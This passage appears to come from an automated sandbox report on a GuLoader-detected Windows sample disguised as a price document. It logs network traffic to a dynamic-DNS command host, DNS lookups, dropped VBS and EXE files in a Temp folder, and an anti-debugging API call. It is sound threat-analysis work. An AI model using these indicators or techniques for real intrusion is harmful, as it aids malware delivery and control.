                            Jan 21, 2021 07:25:43.390405893 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.392153025 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.399983883 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.401230097 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.402622938 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.402643919 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.403045893 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.407974958 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.409982920 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.413197041 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.421225071 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.422044992 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.424004078 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.429024935 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.430350065 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.442063093 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.451349020 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.578974009 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:43.620225906 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:43.700063944 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:43.700165987 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:44.043083906 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.044064999 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.045111895 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.045977116 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.054193974 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.078454018 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.078555107 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.078588963 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.078617096 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.081423044 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.091527939 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.092355967 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.092397928 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.092432022 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.094500065 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.095181942 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.104449034 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.105376005 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.114353895 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.123342991 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.123373985 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.124474049 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.133332968 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.141280890 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.158555031 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.158586025 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.158605099 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.158623934 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.162700891 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.162729979 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.280086994 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.323602915 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:44.364273071 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:44.364435911 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:44.646249056 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.663891077 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.663927078 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.664910078 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.666305065 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.667001963 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.672157049 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.673197985 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.673305988 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.676326990 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.688585043 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.688633919 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.688667059 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.702289104 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.705039978 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.706114054 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.706779003 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.708002090 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.713052988 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.713200092 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.714267969 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.714293003 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.715343952 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.716182947 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.734384060 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.734411955 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.737020969 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.737040997 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.737772942 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.738867044 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.859344959 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:44.901648045 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:44.927551985 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:44.927711964 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:45.279922009 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.285146952 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.285938025 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.285965919 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.292371988 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.302146912 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.312068939 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.312781096 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.312802076 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.314230919 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.315248966 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.331931114 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.339271069 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.339298964 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.339317083 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.339334965 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.339354992 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.349076986 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.349107027 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.351896048 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.353022099 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.354168892 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.355030060 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.364125013 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.380099058 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.380254030 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.380280018 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.380301952 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.380325079 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.382172108 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.470263958 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.511060953 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:45.556516886 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:45.556621075 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:45.910298109 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.911406040 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.922224045 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.924458981 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.932204008 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.932240009 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.932797909 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.934314966 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.940139055 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.940162897 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.944137096 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.948122025 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.948158026 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.960167885 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.960196018 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.972130060 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.972166061 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.973125935 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.974025965 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.975008011 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.984148026 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.992067099 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.992974043 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.993009090 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.994049072 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.995043993 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:45.996084929 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.000017881 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.012077093 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.012105942 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.132250071 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.183289051 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:46.204386950 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:46.204538107 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:46.546145916 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.546935081 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.556209087 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.556247950 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.556268930 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.556288958 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.556308031 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.557239056 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.565401077 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.565794945 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.585215092 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.586105108 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.587078094 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.588067055 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.589226961 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.589740038 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.593089104 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.601229906 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.602056980 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.606945992 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.609477043 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.617427111 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.626303911 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.626341105 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.626363039 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.626383066 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.626667023 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.626682043 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.635900021 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.643362999 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.755377054 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:46.808068037 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:46.824623108 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:46.824784994 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:47.165870905 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.166903973 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.172214031 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.172249079 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.173285007 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.175934076 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.181801081 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.183135033 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.202483892 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.202532053 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.202555895 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.206073999 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.226219893 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.226372957 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.226486921 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.226521969 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.226547956 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.228303909 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.235296965 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.235343933 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.236324072 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.237416029 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.237457991 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.238188982 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.245063066 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.245101929 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.245954990 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.255134106 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.255173922 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.255893946 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.392096996 CET24054973591.193.75.243192.168.2.7
                            Jan 21, 2021 07:25:47.433341026 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:47.467345953 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:47.467458010 CET497352405192.168.2.791.193.75.243
                            Jan 21, 2021 07:25:47.711034060 CET24054972691.193.75.243192.168.2.7

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Jan 21, 2021 07:24:12.932408094 CET192.168.2.78.8.8.80xd46aStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                            Jan 21, 2021 07:24:13.960990906 CET192.168.2.78.8.8.80xd76eStandard query (0)fkteua.db.files.1drv.comA (IP address)IN (0x0001)
                            Jan 21, 2021 07:24:14.459875107 CET192.168.2.78.8.8.80xca13Standard query (0)oluchi.ddns.netA (IP address)IN (0x0001)
                            Jan 21, 2021 07:24:33.119712114 CET192.168.2.78.8.8.80x914cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                            Jan 21, 2021 07:24:34.629179001 CET192.168.2.78.8.8.80xa76aStandard query (0)fkteua.db.files.1drv.comA (IP address)IN (0x0001)
                            Jan 21, 2021 07:24:39.444567919 CET192.168.2.78.8.8.80xd188Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                            Jan 21, 2021 07:24:40.098330975 CET192.168.2.78.8.8.80xb18Standard query (0)fkteua.db.files.1drv.comA (IP address)IN (0x0001)
                            Jan 21, 2021 07:25:44.243402004 CET192.168.2.78.8.8.80x52f2Standard query (0)g.msn.comA (IP address)IN (0x0001)
                            Jan 21, 2021 07:26:29.045977116 CET192.168.2.78.8.8.80xec3fStandard query (0)oluchi.ddns.netA (IP address)IN (0x0001)
                            Jan 21, 2021 07:26:40.572093964 CET192.168.2.78.8.8.80xf343Standard query (0)oluchi.ddns.netA (IP address)IN (0x0001)
                            Jan 21, 2021 07:26:43.713131905 CET192.168.2.78.8.8.80x2d01Standard query (0)oluchi.ddns.netA (IP address)IN (0x0001)
                            Jan 21, 2021 07:26:46.916858912 CET192.168.2.78.8.8.80x4b6dStandard query (0)oluchi.ddns.netA (IP address)IN (0x0001)
                            Jan 21, 2021 07:26:49.918509007 CET192.168.2.78.8.8.80xee6Standard query (0)oluchi.ddns.netA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Jan 21, 2021 07:24:12.983098984 CET8.8.8.8192.168.2.70xd46aNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Jan 21, 2021 07:24:14.069500923 CET8.8.8.8192.168.2.70xd76eNo error (0)fkteua.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                            Jan 21, 2021 07:24:14.069500923 CET8.8.8.8192.168.2.70xd76eNo error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Jan 21, 2021 07:24:14.520232916 CET8.8.8.8192.168.2.70xca13No error (0)oluchi.ddns.net91.193.75.243A (IP address)IN (0x0001)
                            Jan 21, 2021 07:24:33.176738024 CET8.8.8.8192.168.2.70x914cNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Jan 21, 2021 07:24:34.709955931 CET8.8.8.8192.168.2.70xa76aNo error (0)fkteua.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                            Jan 21, 2021 07:24:34.709955931 CET8.8.8.8192.168.2.70xa76aNo error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Jan 21, 2021 07:24:39.492403984 CET8.8.8.8192.168.2.70xd188No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Jan 21, 2021 07:24:40.157777071 CET8.8.8.8192.168.2.70xb18No error (0)fkteua.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                            Jan 21, 2021 07:24:40.157777071 CET8.8.8.8192.168.2.70xb18No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Jan 21, 2021 07:25:44.310305119 CET8.8.8.8192.168.2.70x52f2No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                            Jan 21, 2021 07:26:29.106426001 CET8.8.8.8192.168.2.70xec3fNo error (0)oluchi.ddns.net91.193.75.243A (IP address)IN (0x0001)
                            Jan 21, 2021 07:26:40.628381968 CET8.8.8.8192.168.2.70xf343No error (0)oluchi.ddns.net91.193.75.243A (IP address)IN (0x0001)
                            Jan 21, 2021 07:26:43.771128893 CET8.8.8.8192.168.2.70x2d01No error (0)oluchi.ddns.net91.193.75.243A (IP address)IN (0x0001)
                            Jan 21, 2021 07:26:46.972825050 CET8.8.8.8192.168.2.70x4b6dNo error (0)oluchi.ddns.net91.193.75.243A (IP address)IN (0x0001)
                            Jan 21, 2021 07:26:49.975899935 CET8.8.8.8192.168.2.70xee6No error (0)oluchi.ddns.net91.193.75.243A (IP address)IN (0x0001)

                            Code Manipulations

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            Analysis Process: New Doc 20211401#_our new price.exe PID: 6344 Parent PID: 5712

                            General

                            Start time:07:23:54
                            Start date:21/01/2021
                            Path:C:\Users\user\Desktop\New Doc 20211401#_our new price.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\user\Desktop\New Doc 20211401#_our new price.exe'
                            Imagebase:0x400000
                            File size:98304 bytes
                            MD5 hash:14A7AC7E8A7CC68EE2040EA5F3BB145E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Visual Basic
                            Reputation:low

                            Chronological Activities

                            Analysis Process: New Doc 20211401#_our new price.exe PID: 6556 Parent PID: 6344

                            General

                            Start time:07:24:02
                            Start date:21/01/2021
                            Path:C:\Users\user\Desktop\New Doc 20211401#_our new price.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\user\Desktop\New Doc 20211401#_our new price.exe'
                            Imagebase:0x400000
                            File size:98304 bytes
                            MD5 hash:14A7AC7E8A7CC68EE2040EA5F3BB145E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Chronological Activities

                            Analysis Process: wscript.exe PID: 7092 Parent PID: 3292

                            General

                            Start time:07:24:13
                            Start date:21/01/2021
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.vbs'
                            Imagebase:0x7ff7d50e0000
                            File size:163840 bytes
                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: Indtastningsfacilitet.exe PID: 5412 Parent PID: 7092

                            General

                            Start time:07:24:15
                            Start date:21/01/2021
                            Path:C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
                            Imagebase:0x400000
                            File size:98304 bytes
                            MD5 hash:14A7AC7E8A7CC68EE2040EA5F3BB145E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Visual Basic
                            Antivirus matches:
                            • Detection: 13%, ReversingLabs
                            Reputation:low

                            Chronological Activities

                            Analysis Process: wscript.exe PID: 6284 Parent PID: 3292

                            General

                            Start time:07:24:21
                            Start date:21/01/2021
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.vbs'
                            Imagebase:0x7ff7d50e0000
                            File size:163840 bytes
                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: Indtastningsfacilitet.exe PID: 1340 Parent PID: 5412

                            General

                            Start time:07:24:22
                            Start date:21/01/2021
                            Path:C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
                            Imagebase:0x400000
                            File size:98304 bytes
                            MD5 hash:14A7AC7E8A7CC68EE2040EA5F3BB145E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:low

                            Chronological Activities

                            Analysis Process: Indtastningsfacilitet.exe PID: 3808 Parent PID: 6284

                            General

                            Start time:07:24:23
                            Start date:21/01/2021
                            Path:C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
                            Imagebase:0x400000
                            File size:98304 bytes
                            MD5 hash:14A7AC7E8A7CC68EE2040EA5F3BB145E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Visual Basic
                            Reputation:low

                            Chronological Activities

                            Analysis Process: Indtastningsfacilitet.exe PID: 6564 Parent PID: 3808

                            General

                            Start time:07:24:32
                            Start date:21/01/2021
                            Path:C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe
                            Imagebase:0x400000
                            File size:98304 bytes
                            MD5 hash:14A7AC7E8A7CC68EE2040EA5F3BB145E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:low

                            Chronological Activities

                            Disassembly

                            Code Analysis

                            Reset < >

                              Analysis Process: New Doc 20211401#_our new price.exe PID: 6344 Parent PID: 5712 New Doc 20211401#_our new price.exeCOMMON

                              Executed Functions

                              Function 021512DE, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 206nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0215074C), ref: 02150A4D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: InformationThread
